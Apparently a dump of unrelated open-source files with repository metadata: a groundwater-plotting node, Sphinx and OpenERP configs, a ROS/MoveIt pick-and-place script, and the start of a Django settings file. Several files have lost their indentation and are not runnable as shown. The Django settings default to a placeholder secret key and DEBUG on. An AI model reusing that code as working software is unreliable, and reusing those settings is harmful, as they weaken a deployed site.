from lib.flowchart.nodes.generalNode import NodeWithCtrlWidget, NodeCtrlWidget
class plotGWLvsWLNode(NodeWithCtrlWidget):
"""Plot Growundwater-level VS River water-level (matplotlib) or so-called overhead"""
nodeName = "Plot Overhead"
uiTemplate = [
{'title': 'X: River WL', 'name': 'x', 'type': 'list', 'value': None, 'default': None, 'values': [None], 'tip': 'Name of the column with river waterlevel data.\nWill be plotted on X-axis'},
{'title': 'Y: Well GWL', 'name': 'y', 'type': 'list', 'value': None, 'default': None, 'values': [None], 'tip': 'Name of the column with well groundwater-level\ndata. It will be plotted on Y-axis'},
{'name': 'plot overheads', 'type': 'bool', 'value': False, 'default': False, 'tip': 'If checked, will substract X-values from Y-values element-wise (Yvalues-Xvalues) before\nplotting. This means that so called "overheads" will be plotted on Y-axis and not the\nactual groundwater-levels.\nIf not checked - plots real values of Y-column'},
{'title': 'trendline', 'name': 'trendlinemode', 'type': 'list', 'value': 'None', 'default': 'None', 'values': ['Normal', 'Shifted', 'None'], 'tip': 'Normal - draw trendlines using all data points\nShifted - draw trendlines using all data points, and shift them to the most-far-lying point\nNone - do not draw trendline'},
{'name': 'Hydrological Values', 'type': 'bool', 'expanded': False, 'children': [
{'name': 'MHW', 'type': 'float', 'limits': (-25., 25.), 'step': 0.1, 'tip': 'Mean High Water (ger. MThw)'},
{'name': 'MLW', 'type': 'float', 'limits': (-25., 25.), 'step': 0.1, 'tip': 'Mean Low Water (ger. MTnw)'},
{'name': 'MLWS', 'type': 'float', 'limits': (-25., 25.), 'step': 0.1, 'tip': 'Mean Low Water Springs (ger. MSpTnw)'},
{'name': 'LLW', 'type': 'float', 'limits': (-25., 25.), 'step': 0.1, 'tip': 'Lowest Low Water (ger. NNTnw)'},
]},
{'name': 'Plot Parameters', 'type': 'group', 'expanded': False, 'children': [
{'name': 'title', 'type': 'str', 'value': None, 'default': None, 'tip': 'Figure title (default None)'},
{'name': 'title_fontsize', 'type': 'float', 'value': 20., 'default': 20., 'tip': ''},
{'name': 'xlabel', 'type': 'str', 'value': None, 'default': None, 'tip': 'None, or string for labeling x-axes'},
{'name': 'ylabel', 'type': 'str', 'value': None, 'default': None, 'tip': 'None, or string for labeling y-axes'},
{'name': 'axeslabel_fontsize', 'type': 'float', 'value': 10., 'default': 10., 'tip': ''},
            {'name': 'legendlabels', 'type': 'str', 'value': [None], 'default': [None], 'tip': 'List of legend names or [None]. If default ([None]) - standard names are used'},
{'name': 'legend_fontsize', 'type': 'float', 'value': 8., 'default': 8., 'tip': ''},
{'name': 'axesvalues_fontsize', 'type': 'float', 'value': 10., 'default': 10., 'tip': ''},
{'name': 'annotation_fontsize', 'type': 'float', 'value': 10., 'default': 10., 'tip': 'Fontsize of `Hydrological Values`'},
{'name': 'marker', 'type': 'list', 'value': 'o', 'default': 'o', 'values': ['o', '.', 'x', '+', 'h'], 'tip': 'marker style for points'},
{'title': 'marker size', 'name': 's', 'type': 'int', 'value': 10, 'default': 10, 'tip': 'marker point size'},
{'name': 'xlim', 'type': 'str', 'value': None, 'default': None, 'tip': 'None, or list for x-limits [xmin, xmax] of the plot. (i.e. [0., 1.])'},
{'name': 'ylim', 'type': 'str', 'value': None, 'default': None, 'tip': 'None, or list for y-limits [ymin, ymax] of the plot. (i.e. [-0.5, 0.5])'},
]},
{'name': 'Plot', 'type': 'action'},
]
def __init__(self, name, parent=None):
super(plotGWLvsWLNode, self).__init__(name, parent=parent, terminals={'In': {'io': 'in'}}, color=(150, 150, 250, 150))
def _createCtrlWidget(self, **kwargs):
return plotGWLvsWLNodeCtrlWidget(**kwargs)
def process(self, In):
df = In
if df is not None:
# when we recieve a new dataframe into terminal - update possible selection list
if not self._ctrlWidget.plotAllowed():
colname = [col for col in df.columns if isNumpyNumeric(df[col].dtype)]
self._ctrlWidget.param('y').setLimits(colname)
self._ctrlWidget.param('x').setLimits(colname)
if self._ctrlWidget.plotAllowed():
kwargs = self.ctrlWidget().prepareInputArguments()
with BusyCursor():
if self._ctrlWidget.param('plot overheads').value() is True:
y_name = kwargs['y'][0]
x_name = kwargs['x'][0]
overhead_name = y_name+' - '+x_name
df[overhead_name] = df[y_name]-df[x_name]
kwargs['y'] = [overhead_name]
plot_pandas.plot_pandas_scatter_special1(df, **kwargs)
if self._ctrlWidget.param('plot overheads').value() is True:
del df[overhead_name]
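        # Illustrative example of the overhead computation above (not part of
        # the original source; the column names are hypothetical): with
        # x='river_wl' and y='well_gwl', a temporary column
        # 'well_gwl - river_wl' = df['well_gwl'] - df['river_wl'] is plotted
        # on the Y-axis and deleted again once the figure has been drawn.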
class plotGWLvsWLNodeCtrlWidget(NodeCtrlWidget):
def __init__(self, **kwargs):
super(plotGWLvsWLNodeCtrlWidget, self).__init__(update_on_statechange=False, **kwargs)
self._plotAllowed = False
def initUserSignalConnections(self):
self.param('Plot').sigActivated.connect(self.on_plot_clicked)
@QtCore.pyqtSlot()
def on_plot_clicked(self):
self._plotAllowed = True
self._parent.update()
self._plotAllowed = False
def plotAllowed(self):
return self._plotAllowed
def prepareInputArguments(self):
validArgs = getCallableArgumentList(plot_pandas.plot_pandas_scatter_special1, get='args')
validArgs += ['MHW', 'MLW', 'MLWS', 'LLW']
kwargs = dict()
for param in self.params(ignore_groups=True):
if param.name() in validArgs:
kwargs[param.name()] = self.p.evaluateValue(param.value())
if kwargs['xlabel'] in [None, 'None', '']: kwargs['xlabel'] = kwargs['x']
if kwargs['ylabel'] in [None, 'None', '']: kwargs['ylabel'] = kwargs['y']
kwargs['x'] = [kwargs.pop('x')]
kwargs['y'] = [kwargs.pop('y')]
if self.paramValue('Hydrological Values'):
kwargs['HYDR_VALS'] = dict()
for name in ['MHW', 'MLW', 'MLWS', 'LLW']:
if self.paramValue('Hydrological Values'):
kwargs['HYDR_VALS'][name] = kwargs.pop(name)
else:
kwargs.pop(name)
return kwargs
| gpl-2.0 | -1,190,005,362,130,740,700 | 60.780702 | 350 | 0.556297 | false |
openlmi/openlmi-doc | doc/conf.py | 1 | 9713 | # -*- coding: utf-8 -*-
#
# OpenLMI documentation build configuration file, created by
# sphinx-quickstart on Thu Sep 12 11:07:33 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
def setup(app):
app.add_config_value('includeClasses', 'True', True)
# Register new option to include documentation for metacommand's commands
app.add_config_value('with_commands', False, True)
includeClasses = False
with_commands = True
import sys
from mock import Mock as MagicMock
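# mock modules with heavy/optional C dependencies so autodoc can import the code without them being installed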
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return Mock()
MOCK_MODULES = ['pywsman', 'M2Crypto', 'M2Crypto.SSL', 'M2Crypto.SSL.Checker', 'M2Crypto.X509']
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES)
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('python'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.ifconfig',
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.intersphinx'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'OpenLMI'
copyright = u'OpenLMI authors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'latest'
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "myrtd"
html_theme_path = ["_theme"]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = ['../..']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = False
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'OpenLMI'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'OpenLMI.tex', u'OpenLMI Documentation',
u'OpenLMI authors', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'openlmi', u'OpenLMI Documentation',
[u'OpenLMI authors'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'OpenLMI', u'OpenLMI Documentation',
u'OpenLMI authors', 'OpenLMI', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'OpenLMI'
epub_author = u'OpenLMI authors'
epub_publisher = u'OpenLMI authors'
epub_copyright = u'2013-2014, OpenLMI authors'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
| gpl-2.0 | -3,956,538,577,392,688,600 | 30.13141 | 95 | 0.701431 | false |
sonya/eea | py/common/config.py | 1 | 1080 | DEBUG_MODE = True
#DEBUG_MODE = False
# GNUPlot options
DEFAULT_IMAGE_TYPE = "png" # png, eps
SUPPRESS_PLOT_TITLES = True
DB_NAME = "eea"
DB_PORT = ":5432"
TEST_SCHEMA = "test" # schema for creating verification tables
PROJECT_ROOT = __PROJECT_ROOT__
# things below here probably don't need to be changed much
DATA_DIR = PROJECT_ROOT + "/data"
DATA_CACHE_DIR = PROJECT_ROOT + "/data/cache"
ENV_SERIES_TITLES = {
"EU": "gross energy use",
"CO": "carbon monoxide (CO)",
"CO2": "CO_2",
"CH4": "methane (CH_4)",
"N2O": "nitrous oxide (N_2O)",
"SF6": "sulfur hexafluoride (SF_6)",
"PFCs": "perfluorinated compounds (PFCs)",
"HFCs": "hydroflurocarbons (HFCs)",
"GHG total": "greenhouse gas total",
"NOx": "nitrogen oxides (NO_x)",
"SOx": "sulfur oxides (SO_x)",
"BOD": "biochemical oxygen demand (BOD)",
"TSP": "total suspended particulates (TSP)",
"NMVOC": "non-methane volatile organic compounds",
"NH3": "ammonia (NH_3)",
"waste": "total waste",
"waste-hi": "hazardous waste - improperly disposed",
}
| apache-2.0 | 4,881,714,132,381,469,000 | 26 | 63 | 0.625 | false |
sohovet/sohovet | sohovet_stock_report/__openerp__.py | 1 | 2121 | # -*- encoding: utf-8 -*-
##############################################################################
# #
# OpenERP, Open Source Management Solution. #
# #
# @author Juan Ignacio Alonso Barba <[email protected]> #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as #
# published by the Free Software Foundation, either version 3 of the #
# License, or (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
##############################################################################
{
'name': 'SOHOVet stock report',
'version': '1.0',
'category': 'Productos',
'description': """Informes de almacen""",
'author': 'Juan Ignacio Alonso Barba',
'website': 'http://www.enzo.es/',
'license': 'AGPL-3',
'depends': [
'sohovet_product',
'sohovet_product_sublocation',
],
'data': [
'wizard/sohovet_stock_report.xml',
'report/informe_stock.xml',
'sohovet_report_menu.xml',
],
'active': False,
'installable': True,
}
| agpl-3.0 | -1,146,224,283,432,824,300 | 49.5 | 78 | 0.41537 | false |
Aharobot/inmoov_ros | robbie_sim/node/get_beer.py | 1 | 18206 | #!/usr/bin/env python
"""
get_beer.py - Version 0.1 2015-03-11
pick up the beer can and deliver it another
"""
import rospy, sys
import moveit_commander
from geometry_msgs.msg import PoseStamped, Pose
from moveit_commander import MoveGroupCommander, PlanningSceneInterface
from moveit_msgs.msg import PlanningScene, ObjectColor
from moveit_msgs.msg import Grasp, GripperTranslation, MoveItErrorCodes
from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint
from tf.transformations import quaternion_from_euler
from copy import deepcopy
from actionlib import SimpleActionClient
from move_base_msgs.msg import *
from actionlib_msgs.msg import *
from geometry_msgs.msg import *
GROUP_NAME_ARM = 'right_arm'
GROUP_NAME_GRIPPER = 'right_gripper'
GRIPPER_FRAME = 'right_gripper_link'
GRIPPER_OPEN = [0.1]
GRIPPER_CLOSED = [0.5]
GRIPPER_NEUTRAL = [0.0]
GRIPPER_JOINT_NAMES = ['right_arm_gripper_joint']
GRIPPER_EFFORT = [1.0]
REFERENCE_FRAME = 'map'
#Map location of targets
X_FRIDGE = 1.65
Y_FRIDGE = -1.6
X_PERSON = 1.9
Y_PERSON = 1.8
class MoveItDemo:
def __init__(self):
# Initialize the move_group API
moveit_commander.roscpp_initialize(sys.argv)
rospy.init_node('moveit_demo')
# Use the planning scene object to add or remove objects
scene = PlanningSceneInterface()
# Create a scene publisher to push changes to the scene
self.scene_pub = rospy.Publisher('planning_scene', PlanningScene)
# Create a publisher for displaying gripper poses
self.gripper_pose_pub = rospy.Publisher('gripper_pose', PoseStamped)
# Create a dictionary to hold object colors
self.colors = dict()
#move_base action
self.fridge = (Pose(Point(X_FRIDGE, Y_FRIDGE, 0.0), Quaternion(0.0, 0.0, 0, 1))) #location of the beer
self.person = (Pose(Point(X_PERSON, Y_PERSON, 0.0), Quaternion(0.0, 0.0, 0, 1))) #person requesting the beer
        self.station = (Pose(Point(0.5, 0.0, 0.0), Quaternion(0.0, 0.0, 0, 1))) #robot's home/docking station
self.client = SimpleActionClient("move_base", MoveBaseAction)
self.client.wait_for_server()
# Initialize the move group for the right arm
right_arm = MoveGroupCommander(GROUP_NAME_ARM)
left_arm = MoveGroupCommander('left_arm')
# Initialize the move group for the right gripper
right_gripper = MoveGroupCommander(GROUP_NAME_GRIPPER)
# Get the name of the end-effector link
end_effector_link = right_arm.get_end_effector_link()
# Allow some leeway in position (meters) and orientation (radians)
right_arm.set_goal_position_tolerance(0.05)
right_arm.set_goal_orientation_tolerance(0.1)
# Allow replanning to increase the odds of a solution
right_arm.allow_replanning(True)
# Set the right arm reference frame
right_arm.set_pose_reference_frame(REFERENCE_FRAME)
# Allow 10 seconds per planning attempt
right_arm.set_planning_time(10)
# Set a limit on the number of pick attempts before bailing
max_pick_attempts = 10
# Set a limit on the number of place attempts
max_place_attempts = 5
# Give the scene a chance to catch up
rospy.sleep(2)
# Give each of the scene objects a unique name
table_id = 'table'
box1_id = 'box1'
box2_id = 'box2'
target_id = 'target'
tool_id = 'tool'
person1_id = 'person1'
# Remove leftover objects from a previous run
scene.remove_world_object(table_id)
scene.remove_world_object(box1_id)
scene.remove_world_object(box2_id)
scene.remove_world_object(target_id)
scene.remove_world_object(tool_id)
scene.remove_world_object(person1_id)
# Remove any attached objects from a previous session
scene.remove_attached_object(GRIPPER_FRAME, target_id)
# Give the scene a chance to catch up
rospy.sleep(1)
# Start the arm in the "resting" pose stored in the SRDF file
right_arm.set_named_target('right_start')
right_arm.go()
left_arm.set_named_target('left_start')
left_arm.go()
# Open the gripper to the neutral position
right_gripper.set_joint_value_target(GRIPPER_NEUTRAL)
right_gripper.go()
rospy.sleep(1)
# Set the height of the table off the ground
table_ground = 0.65
# Set the dimensions of the scene objects [l, w, h]
table_size = [0.2, 0.7, 0.01]
box1_size = [0.1, 0.05, 0.05]
box2_size = [0.05, 0.05, 0.15]
person1_size = [0.3, 0.7, 0.01]
# Set the target size [l, w, h]
target_size = [0.02, 0.01, 0.12]
# Add a table top and two boxes to the scene
table_pose = PoseStamped()
table_pose.header.frame_id = REFERENCE_FRAME
table_pose.pose.position.x = X_FRIDGE + 0.55
table_pose.pose.position.y = Y_FRIDGE + 0.0
table_pose.pose.position.z = table_ground + table_size[2] / 2.0
table_pose.pose.orientation.w = 1.0
scene.add_box(table_id, table_pose, table_size)
box1_pose = PoseStamped()
box1_pose.header.frame_id = REFERENCE_FRAME
box1_pose.pose.position.x = X_FRIDGE + 0.55
box1_pose.pose.position.y = Y_FRIDGE + -0.1
box1_pose.pose.position.z = table_ground + table_size[2] + box1_size[2] / 2.0
box1_pose.pose.orientation.w = 1.0
scene.add_box(box1_id, box1_pose, box1_size)
box2_pose = PoseStamped()
box2_pose.header.frame_id = REFERENCE_FRAME
box2_pose.pose.position.x = X_FRIDGE + 0.54
box2_pose.pose.position.y = Y_FRIDGE + 0.13
box2_pose.pose.position.z = table_ground + table_size[2] + box2_size[2] / 2.0
box2_pose.pose.orientation.w = 1.0
scene.add_box(box2_id, box2_pose, box2_size)
#add the person to the scene
person1_pose = PoseStamped()
person1_pose.header.frame_id = REFERENCE_FRAME
person1_pose.pose.position.x = X_PERSON + 0.54
person1_pose.pose.position.y = Y_PERSON + 0.13
person1_pose.pose.position.z = table_ground + table_size[2] + person1_size[2] / 2.0
person1_pose.pose.orientation.w = 1.0
scene.add_box(person1_id, person1_pose, person1_size)
# Set the target pose in between the boxes and on the table
target_pose = PoseStamped()
target_pose.header.frame_id = REFERENCE_FRAME
target_pose.pose.position.x = X_FRIDGE + 0.50
target_pose.pose.position.y = Y_FRIDGE + 0.0
target_pose.pose.position.z = table_ground + table_size[2] + target_size[2] / 2.0
target_pose.pose.orientation.w = 1.0
# Add the target object to the scene
scene.add_box(target_id, target_pose, target_size)
# Make the table red and the boxes orange
self.setColor(table_id, 0.8, 0, 0, 1.0)
self.setColor(box1_id, 0.8, 0.4, 0, 1.0)
self.setColor(box2_id, 0.8, 0.4, 0, 1.0)
self.setColor(person1_id, 0.8, 0, 0, 1.0)
# Make the target yellow
self.setColor(target_id, 0.9, 0.9, 0, 1.0)
# Send the colors to the planning scene
self.sendColors()
# Set the support surface name to the table object
right_arm.set_support_surface_name(table_id)
# Specify a pose to place the target after being picked up
place_pose = PoseStamped()
place_pose.header.frame_id = REFERENCE_FRAME
place_pose.pose.position.x = X_PERSON + 0.50
place_pose.pose.position.y = Y_PERSON + -0.25
place_pose.pose.position.z = table_ground + table_size[2] + target_size[2] / 2.0
place_pose.pose.orientation.w = 1.0
#move to target
self.move_to(self.fridge)
# Initialize the grasp pose to the target pose
grasp_pose = target_pose
# Shift the grasp pose by half the width of the target to center it
grasp_pose.pose.position.y -= target_size[1] / 2.0
# Generate a list of grasps
grasps = self.make_grasps(grasp_pose, [target_id])
# Publish the grasp poses so they can be viewed in RViz
for grasp in grasps:
self.gripper_pose_pub.publish(grasp.grasp_pose)
rospy.sleep(0.2)
# Track success/failure and number of attempts for pick operation
result = None
n_attempts = 0
# Repeat until we succeed or run out of attempts
while result != MoveItErrorCodes.SUCCESS and n_attempts < max_pick_attempts:
n_attempts += 1
rospy.loginfo("Pick attempt: " + str(n_attempts))
result = right_arm.pick(target_id, grasps)
rospy.sleep(0.2)
# If the pick was successful, attempt the place operation
if result == MoveItErrorCodes.SUCCESS:
result = None
n_attempts = 0
#_------------------------now we move to the other table__________-------------------------------------------
right_arm.set_named_target('r_travel')
right_arm.go()
self.move_to(self.person)
#_------------------------now we move to the other table__________-------------------------------------------
# Generate valid place poses
places = self.make_places(place_pose)
# Repeat until we succeed or run out of attempts
while result != MoveItErrorCodes.SUCCESS and n_attempts < max_place_attempts:
n_attempts += 1
rospy.loginfo("Place attempt: " + str(n_attempts))
for place in places:
result = right_arm.place(target_id, place)
if result == MoveItErrorCodes.SUCCESS:
break
rospy.sleep(0.2)
if result != MoveItErrorCodes.SUCCESS:
rospy.loginfo("Place operation failed after " + str(n_attempts) + " attempts.")
else:
rospy.loginfo("Pick operation failed after " + str(n_attempts) + " attempts.")
# Return the arm to the "resting" pose stored in the SRDF file
right_arm.set_named_target('right_start')
right_arm.go()
# Open the gripper to the neutral position
right_gripper.set_joint_value_target(GRIPPER_NEUTRAL)
right_gripper.go()
rospy.sleep(1)
#move to station
self.move_to(self.station)
# Shut down MoveIt cleanly
moveit_commander.roscpp_shutdown()
# Exit the script
moveit_commander.os._exit(0)
# move to location
def move_to(self, location):
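        # send the base to the given map pose and wait up to 40 seconds for the result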
goal = MoveBaseGoal()
goal.target_pose.pose = location
goal.target_pose.header.frame_id = 'map'
goal.target_pose.header.stamp = rospy.Time.now()
self.client.send_goal(goal)
#self.client.wait_for_result()
self.client.wait_for_result(rospy.Duration.from_sec(40.0))
if self.client.get_state() == GoalStatus.SUCCEEDED:
result = self.client.get_result()
print "Result: SUCCEEDED "
elif self.client.get_state() == GoalStatus.PREEMPTED:
print "Action pre-empted"
else:
print "Action failed"
# Get the gripper posture as a JointTrajectory
def make_gripper_posture(self, joint_positions):
# Initialize the joint trajectory for the gripper joints
t = JointTrajectory()
# Set the joint names to the gripper joint names
t.joint_names = GRIPPER_JOINT_NAMES
# Initialize a joint trajectory point to represent the goal
tp = JointTrajectoryPoint()
# Assign the trajectory joint positions to the input positions
tp.positions = joint_positions
# Set the gripper effort
tp.effort = GRIPPER_EFFORT
tp.time_from_start = rospy.Duration(1.0)
# Append the goal point to the trajectory points
t.points.append(tp)
# Return the joint trajectory
return t
# Generate a gripper translation in the direction given by vector
def make_gripper_translation(self, min_dist, desired, vector):
# Initialize the gripper translation object
g = GripperTranslation()
# Set the direction vector components to the input
g.direction.vector.x = vector[0]
g.direction.vector.y = vector[1]
g.direction.vector.z = vector[2]
# The vector is relative to the gripper frame
g.direction.header.frame_id = GRIPPER_FRAME
# Assign the min and desired distances from the input
g.min_distance = min_dist
g.desired_distance = desired
return g
# Generate a list of possible grasps
def make_grasps(self, initial_pose_stamped, allowed_touch_objects):
# Initialize the grasp object
g = Grasp()
# Set the pre-grasp and grasp postures appropriately
g.pre_grasp_posture = self.make_gripper_posture(GRIPPER_OPEN)
g.grasp_posture = self.make_gripper_posture(GRIPPER_CLOSED)
# Set the approach and retreat parameters as desired
g.pre_grasp_approach = self.make_gripper_translation(0.01, 0.1, [1.0, 0.0, 0.0])
g.post_grasp_retreat = self.make_gripper_translation(0.1, 0.15, [0.0, -1.0, 1.0])
# Set the first grasp pose to the input pose
g.grasp_pose = initial_pose_stamped
# Pitch angles to try
pitch_vals = [0, 0.1, -0.1, 0.2, -0.2, 0.3, -0.3]
# Yaw angles to try
yaw_vals = [0]
# A list to hold the grasps
grasps = []
# Generate a grasp for each pitch and yaw angle
for y in yaw_vals:
for p in pitch_vals:
# Create a quaternion from the Euler angles
q = quaternion_from_euler(0, p, y)
# Set the grasp pose orientation accordingly
g.grasp_pose.pose.orientation.x = q[0]
g.grasp_pose.pose.orientation.y = q[1]
g.grasp_pose.pose.orientation.z = q[2]
g.grasp_pose.pose.orientation.w = q[3]
                # Set an id for this grasp (simply needs to be unique)
g.id = str(len(grasps))
# Set the allowed touch objects to the input list
g.allowed_touch_objects = allowed_touch_objects
# Don't restrict contact force
g.max_contact_force = 0
# Degrade grasp quality for increasing pitch angles
g.grasp_quality = 1.0 - abs(p)
# Append the grasp to the list
grasps.append(deepcopy(g))
# Return the list
return grasps
# Generate a list of possible place poses
def make_places(self, init_pose):
# Initialize the place location as a PoseStamped message
place = PoseStamped()
# Start with the input place pose
place = init_pose
# A list of x shifts (meters) to try
x_vals = [0, 0.005, 0.01, 0.015, -0.005, -0.01, -0.015]
# A list of y shifts (meters) to try
y_vals = [0, 0.005, 0.01, 0.015, -0.005, -0.01, -0.015]
pitch_vals = [0]
# A list of yaw angles to try
yaw_vals = [0]
# A list to hold the places
places = []
# Generate a place pose for each angle and translation
        for yaw in yaw_vals:
            for p in pitch_vals:
                for dy in y_vals:
                    for dx in x_vals:
                        place.pose.position.x = init_pose.pose.position.x + dx
                        place.pose.position.y = init_pose.pose.position.y + dy
                        # Create a quaternion from the Euler angles
                        q = quaternion_from_euler(0, p, yaw)
# Set the place pose orientation accordingly
place.pose.orientation.x = q[0]
place.pose.orientation.y = q[1]
place.pose.orientation.z = q[2]
place.pose.orientation.w = q[3]
# Append this place pose to the list
places.append(deepcopy(place))
# Return the list
return places
# Set the color of an object
def setColor(self, name, r, g, b, a = 0.9):
# Initialize a MoveIt color object
color = ObjectColor()
# Set the id to the name given as an argument
color.id = name
# Set the rgb and alpha values given as input
color.color.r = r
color.color.g = g
color.color.b = b
color.color.a = a
# Update the global color dictionary
self.colors[name] = color
# Actually send the colors to MoveIt!
def sendColors(self):
# Initialize a planning scene object
p = PlanningScene()
# Need to publish a planning scene diff
p.is_diff = True
# Append the colors from the global color dictionary
for color in self.colors.values():
p.object_colors.append(color)
# Publish the scene diff
self.scene_pub.publish(p)
if __name__ == "__main__":
MoveItDemo()
| bsd-3-clause | -6,091,614,471,985,841,000 | 36.155102 | 121 | 0.569263 | false |
richardcornish/conference | emojiweather/emojiweather/settings.py | 1 | 4647 | # Settings
# https://docs.djangoproject.com/en/2.0/topics/settings/
# https://docs.djangoproject.com/en/2.0/ref/settings/
# https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
import os
import django_heroku
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = os.environ.get('SECRET_KEY', 'fake-key')
DEBUG = os.environ.get('DEBUG', True)
ALLOWED_HOSTS = [
'.herokuapp.com',
'.emojiweather.app',
]
INTERNAL_IPS = [
'127.0.0.1',
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.sitemaps',
'django.contrib.sites',
'django.contrib.staticfiles',
'debug_toolbar',
'widget_tweaks',
'about',
'commands',
'search',
'sms',
'voice',
'utils',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
